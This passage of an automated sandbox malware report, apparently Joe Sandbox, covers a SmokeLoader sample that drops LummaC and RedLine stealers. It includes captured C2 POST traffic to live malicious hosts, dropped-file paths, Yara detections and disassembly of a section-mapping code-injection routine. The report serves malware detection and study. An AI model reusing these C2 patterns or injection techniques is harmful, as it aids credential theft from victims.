                                                                                                        Oct 3, 2023 18:04:29.602847099 CEST6732OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://kjhodokd.net/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 230
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:29.602881908 CEST6732OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 5f c7 ea
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vuX_u]i6t6kbPVL+VX!BF7+qEhN+c"|K}@My676Ubksjh"P[
                                                                                                        Oct 3, 2023 18:04:30.447798014 CEST6732INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:30 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        98192.168.2.349922211.171.233.12980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:33.701736927 CEST6733OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://giswtqwpwp.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 204
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:33.701767921 CEST6733OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7a 3b c0 e9
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vuz;DDjriHr4ed[,mITt@SJ]YP=Z+k^R6j^ %t1\I
                                                                                                        Oct 3, 2023 18:04:34.546224117 CEST6734INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:34 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        99192.168.2.349924189.232.58.10380C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:04:37.379834890 CEST6741OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://fmvxkv.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 366
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:04:37.379868984 CEST6742OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 25 af fb
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA .[k,vuF%xRAuOmXX6&+yPzcw'@({u$F.[5kIUVLS/$B0TjdaK$vzob*>
                                                                                                        Oct 3, 2023 18:04:38.078706980 CEST6742INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:04:37 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 03 00 00 00 72 e8 84
                                                                                                        Data Ascii: r


                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.349934172.67.171.76443C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2023-10-03 16:05:16 UTC0OUTGET /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept: */*
                                                                                                        Referer: http://iyfrm.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Host: kingpirate.ru
                                                                                                        2023-10-03 16:05:16 UTC0INHTTP/1.1 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:05:16 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                        Set-Cookie: KPOSESSID=95e0sj81hgog809vlgk9ogkk5u0odbgnruk4mqi64t0odh5g4ic0; expires=Wed, 04-Oct-2023 16:04:47 GMT; path=/; secure; HttpOnly
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y%2Fhq1GqZekzilWUuM18m9mByapCumZDbFkkGHiB4ZLYvhPixIrgjDjEIay84ZWDBn%2B8vpufvS5pjNEt%2BdZP0LUIBprlwWeWuzfW%2Ff%2BfzKgVpMrFmqHw%2F8dYbjpIDJ8ap"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066cf79c273ae8-IAD
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2023-10-03 16:05:16 UTC1INData Raw: 61 36 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 41 72 72 61 79 20 74 6f 20 73 74 72 69 6e 67 20 63 6f 6e 76 65 72 73 69 6f 6e 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 77 77 77 2e 6b 69 6e 67 70 69 72 61 74 65 2e 72 75 2f 6c 69 62 72 61 72 79 2f 50 68 6f 72 6d 58 2f 42 6f 6f 74 73 74 72 61 70 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 43 6f 6e 74 72 6f 6c 6c 65 72 20 63 6c 61 73 73 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a
                                                                                                        Data Ascii: a6<br /><b>Notice</b>: Array to string conversion in <b>/var/www/www.kingpirate.ru/library/PhormX/Bootstrap.php</b> on line <b>71</b><br />Controller class not found
                                                                                                        2023-10-03 16:05:16 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:18:01:54
                                                                                                        Start date:03/10/2023
                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\Desktop\file.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:302'592 bytes
                                                                                                        MD5 hash:9E0025C871AE4E48587BDEC5AA9E8778
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.886072573.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.899710325.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.899710325.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.899739765.0000000002421000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.899739765.0000000002421000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.899774511.0000000002587000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.899704106.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:1
                                                                                                        Start time:18:01:59
                                                                                                        Start date:03/10/2023
                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                        Imagebase:0x7ff6a6f20000
                                                                                                        File size:3'933'184 bytes
                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:18:02:19
                                                                                                        Start date:03/10/2023
                                                                                                        Path:C:\Users\user\AppData\Roaming\wfshtit
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Roaming\wfshtit
                                                                                                        Imagebase:0x400000
                                                                                                        File size:302'592 bytes
                                                                                                        MD5 hash:9E0025C871AE4E48587BDEC5AA9E8778
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.951709724.0000000002431000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.951709724.0000000002431000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.940635525.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.951734565.0000000002516000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.951699501.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.951699501.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.951696047.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 34%, ReversingLabs
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:10
                                                                                                        Start time:18:02:39
                                                                                                        Start date:03/10/2023
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\46A3.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\46A3.exe
                                                                                                        Imagebase:0x330000
                                                                                                        File size:3'413'536 bytes
                                                                                                        MD5 hash:4527E3FE757DD266980F572C43F22EF3
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 0000000A.00000002.984079448.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\AppData\Local\Temp\46A3.exe, Author: ditekSHen
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:11
                                                                                                        Start time:18:02:40
                                                                                                        Start date:03/10/2023
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        Imagebase:0x920000
                                                                                                        File size:64'704 bytes
                                                                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:13
                                                                                                        Start time:18:02:44
                                                                                                        Start date:03/10/2023
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\BB04.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\BB04.exe
                                                                                                        Imagebase:0x280000
                                                                                                        File size:624'640 bytes
                                                                                                        MD5 hash:59E6F40D24C3EA84FA3BCF55B8F72C9D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 58%, ReversingLabs
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:14
                                                                                                        Start time:18:02:44
                                                                                                        Start date:03/10/2023
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7e86d0000
                                                                                                        File size:625'664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:15
                                                                                                        Start time:18:02:45
                                                                                                        Start date:03/10/2023
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        Imagebase:0xec0000
                                                                                                        File size:102'568 bytes
                                                                                                        MD5 hash:4DF5F963C7E18F062E49870D0AFF8F6F
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:18
                                                                                                        Start time:18:02:45
                                                                                                        Start date:03/10/2023
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 152
                                                                                                        Imagebase:0x1150000
                                                                                                        File size:434'592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:4.4%
                                                                                                          Dynamic/Decrypted Code Coverage:75.2%
                                                                                                          Signature Coverage:51.4%
                                                                                                          Total number of Nodes:105
                                                                                                          Total number of Limit Nodes:7
                                                                                                          execution_graph 7728 402e41 7730 402e3a 7728->7730 7731 402ece 7730->7731 7732 4018c9 7730->7732 7733 4018d8 7732->7733 7734 401911 Sleep 7733->7734 7739 4013fb 7734->7739 7736 40192c 7738 40193d 7736->7738 7751 4014f4 7736->7751 7738->7731 7741 401404 7739->7741 7740 4013f2 7740->7736 7741->7740 7742 4015a9 NtDuplicateObject 7741->7742 7742->7740 7743 4015c6 NtCreateSection 7742->7743 7744 401646 NtCreateSection 7743->7744 7745 4015ec NtMapViewOfSection 7743->7745 7744->7740 7747 401672 7744->7747 7745->7744 7746 40160f NtMapViewOfSection 7745->7746 7746->7744 7748 40162d 7746->7748 7747->7740 7749 40167c NtMapViewOfSection 7747->7749 7748->7744 7749->7740 7750 4016a3 NtMapViewOfSection 7749->7750 7750->7740 7752 401503 7751->7752 7753 4015a9 NtDuplicateObject 7752->7753 7761 4016c5 7752->7761 7754 4015c6 NtCreateSection 7753->7754 7753->7761 7755 401646 NtCreateSection 7754->7755 7756 4015ec NtMapViewOfSection 7754->7756 7758 401672 7755->7758 7755->7761 7756->7755 7757 40160f NtMapViewOfSection 7756->7757 7757->7755 7759 40162d 7757->7759 7760 40167c NtMapViewOfSection 7758->7760 7758->7761 7759->7755 7760->7761 7762 4016a3 NtMapViewOfSection 7760->7762 7761->7738 7762->7761 7938 401501 7939 40152d 7938->7939 7940 4015a9 NtDuplicateObject 7939->7940 7948 4016c5 7939->7948 7941 4015c6 NtCreateSection 7940->7941 7940->7948 7942 401646 NtCreateSection 7941->7942 7943 4015ec NtMapViewOfSection 7941->7943 7945 401672 7942->7945 7942->7948 7943->7942 7944 40160f NtMapViewOfSection 7943->7944 7944->7942 7946 40162d 7944->7946 7947 40167c NtMapViewOfSection 7945->7947 7945->7948 7946->7942 7947->7948 7949 4016a3 NtMapViewOfSection 7947->7949 7949->7948 7763 424180 7764 424197 7763->7764 7767 423b30 7764->7767 7766 424448 7769 423b56 __write_nolock 7767->7769 7768 423cf8 LocalAlloc 7770 423d1c 7768->7770 7769->7768 7771 423fe3 VirtualProtect 7770->7771 7772 424009 7771->7772 7773 424040 LoadLibraryW 7772->7773 7774 4240c9 7773->7774 7774->7766 7816 402e07 7818 402e17 7816->7818 7817 4018c9 15 API calls 7819 402ece 7817->7819 7818->7817 7818->7819 7775 40a648 7776 40a660 _wcslen 7775->7776 7780 40a658 7775->7780 7781 40ade3 7776->7781 7778 40ade3 __calloc_crt RtlAllocateHeap 7779 40a684 _wcslen __wsetenvp 7778->7779 7779->7778 7779->7780 7784 40adec 7781->7784 7783 40ae29 7783->7779 7784->7783 7785 40da32 7784->7785 7786 40da3e __calloc_crt 7785->7786 7787 40da6c RtlAllocateHeap 7786->7787 7788 40da4a 7786->7788 7787->7786 7787->7788 7788->7784 7899 4012aa 7900 4012b9 7899->7900 7901 4015a9 NtDuplicateObject 7900->7901 7909 4013f2 7900->7909 7902 4015c6 NtCreateSection 7901->7902 7901->7909 7903 401646 NtCreateSection 7902->7903 7904 4015ec NtMapViewOfSection 7902->7904 7906 401672 7903->7906 7903->7909 7904->7903 7905 40160f NtMapViewOfSection 7904->7905 7905->7903 7907 40162d 7905->7907 7908 40167c NtMapViewOfSection 7906->7908 7906->7909 7907->7903 7908->7909 7910 4016a3 NtMapViewOfSection 7908->7910 7910->7909 7840 4018d4 7841 4018ea 7840->7841 7842 401911 Sleep 7841->7842 7843 4013fb 7 API calls 7842->7843 7844 40192c 7843->7844 7845 4014f4 7 API calls 7844->7845 7846 40193d 7844->7846 7845->7846 7789 258c641 7790 258c650 7789->7790 7793 258cde1 7790->7793 7796 258cdfc 7793->7796 7794 258ce05 CreateToolhelp32Snapshot 7795 258ce21 Module32First 7794->7795 7794->7796 7797 258ce30 7795->7797 7798 258c659 7795->7798 7796->7794 7796->7795 7800 258caa0 7797->7800 7801 258cacb 7800->7801 7802 258cb14 7801->7802 7803 258cadc VirtualAlloc 7801->7803 7802->7802 7803->7802 7935 40915c 7936 40ade3 __calloc_crt RtlAllocateHeap 7935->7936 7937 409168 7936->7937

                                                                                                          Executed Functions

                                                                                                          Function 004012AB Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 392COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 4012ab-4012b2 1 4012c3 0->1 2 4012b9-4012da 0->2 1->2 7 4012ee 2->7 8 4012df-4012ea 2->8 7->8 9 4012f1-40138a call 401186 7->9 8->9 16 401408 9->16 17 40138c 9->17 20 40140b-401411 16->20 18 401404 17->18 19 40138e-40139c 17->19 18->16 21 401415 18->21 22 4013fa-401403 19->22 23 40139e-40143e 19->23 24 401418-40143c 20->24 21->20 21->24 22->18 27 40143f-40145b call 401186 23->27 24->27 33 4013f2-4013f8 27->33 34 40145d-401481 27->34 36 4014a0-4014a3 34->36 37 401483-401487 34->37 39 401502-401553 call 401186 36->39 40 4014a5-4014b4 36->40 37->36 38 401489-40148e 37->38 38->36 41 401491-40149f 38->41 57 401555 39->57 58 401558-40155d 39->58 44 4014b6-4014b8 40->44 41->36 44->44 46 4014ba-4014ce 44->46 48 4014d0-4014d2 46->48 49 4014ea-4014f1 46->49 57->58 60 401563-401574 58->60 61 401878-401880 58->61 64 401876-401897 60->64 65 40157a-4015a3 60->65 61->58 72 4018a6 64->72 73 40189d-4018c6 call 401186 64->73 65->64 74 4015a9-4015c0 NtDuplicateObject 65->74 72->73 74->64 75 4015c6-4015ea NtCreateSection 74->75 77 401646-40166c NtCreateSection 75->77 78 4015ec-40160d NtMapViewOfSection 75->78 77->64 82 401672-401676 77->82 78->77 81 40160f-40162b NtMapViewOfSection 78->81 81->77 83 40162d-401643 81->83 82->64 84 40167c-40169d NtMapViewOfSection 82->84 83->77 84->64 87 4016a3-4016bf NtMapViewOfSection 84->87 87->64 90 4016c5 call 4016ca 87->90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: O$u
                                                                                                          • API String ID: 0-1426094074
                                                                                                          • Opcode ID: fc28355d1bd9b55e96d57c391207adfdeb1b039e1bb682a9e10912c63c4cda28
                                                                                                          • Instruction ID: 6c0fdc4d84967332c471f3e59838abf2ed393e8be5ddaf11b6e9a247f6d6b291
                                                                                                          • Opcode Fuzzy Hash: fc28355d1bd9b55e96d57c391207adfdeb1b039e1bb682a9e10912c63c4cda28
                                                                                                          • Instruction Fuzzy Hash: F5D12571904245EBDB219F55CC44EAB7BB8FF82714F24417BE952BA1F1D2388602CB6A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004014F4 Relevance: 10.7, APIs: 7, Instructions: 181nativeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 92 4014f4-401553 call 401186 104 401555 92->104 105 401558-40155d 92->105 104->105 107 401563-401574 105->107 108 401878-401880 105->108 111 401876-401897 107->111 112 40157a-4015a3 107->112 108->105 119 4018a6 111->119 120 40189d-4018c6 call 401186 111->120 112->111 121 4015a9-4015c0 NtDuplicateObject 112->121 119->120 121->111 122 4015c6-4015ea NtCreateSection 121->122 124 401646-40166c NtCreateSection 122->124 125 4015ec-40160d NtMapViewOfSection 122->125 124->111 129 401672-401676 124->129 125->124 128 40160f-40162b NtMapViewOfSection 125->128 128->124 130 40162d-401643 128->130 129->111 131 40167c-40169d NtMapViewOfSection 129->131 130->124 131->111 134 4016a3-4016bf NtMapViewOfSection 131->134 134->111 137 4016c5 call 4016ca 134->137
                                                                                                          APIs
                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.899446606.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 1546783058-0
                                                                                                          • Opcode ID: 718cf7cf2070750d6a03261995fd349e41501109dfa1350d1f46578160f340bf
                                                                                                          • Instruction ID: 17c8b5c6b7d03a249af4a1ce3f33b6d11283f5bd133b62a523f5e2d8a45d1619
                                                                                                          • Opcode Fuzzy Hash: 718cf7cf2070750d6a03261995fd349e41501109dfa1350d1f46578160f340bf
                                                                                                          • Instruction Fuzzy Hash: 0D512D71900205BFEB209F91CC48FEF7BB8EF85B00F104129F912BA2E5E6749941CB65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00401501 Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 139 401501-401553 call 401186 146 401555 139->146 147 401558-40155d 139->147 146->147 149 401563-401574 147->149 150 401878-401880 147->150 153 401876-401897 149->153 154 40157a-4015a3 149->154 150->147 161 4018a6 153->161 162 40189d-4018c6 call 401186 153->162 154->153 163 4015a9-4015c0 NtDuplicateObject 154->163 161->162 163->153 164 4015c6-4015ea NtCreateSection 163->164 166 401646-40166c NtCreateSection 164->166 167 4015ec-40160d NtMapViewOfSection 164->167 166->153 171 401672-401676 166->171 167->166 170 40160f-40162b NtMapViewOfSection 167->170 170->166 172 40162d-401643 170->172 171->153 173 40167c-40169d NtMapViewOfSection 171->173 172->166 173->153 176 4016a3-4016bf NtMapViewOfSection 173->176 176->153 179 4016c5 call 4016ca 176->179
                                                                                                          APIs
                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401608
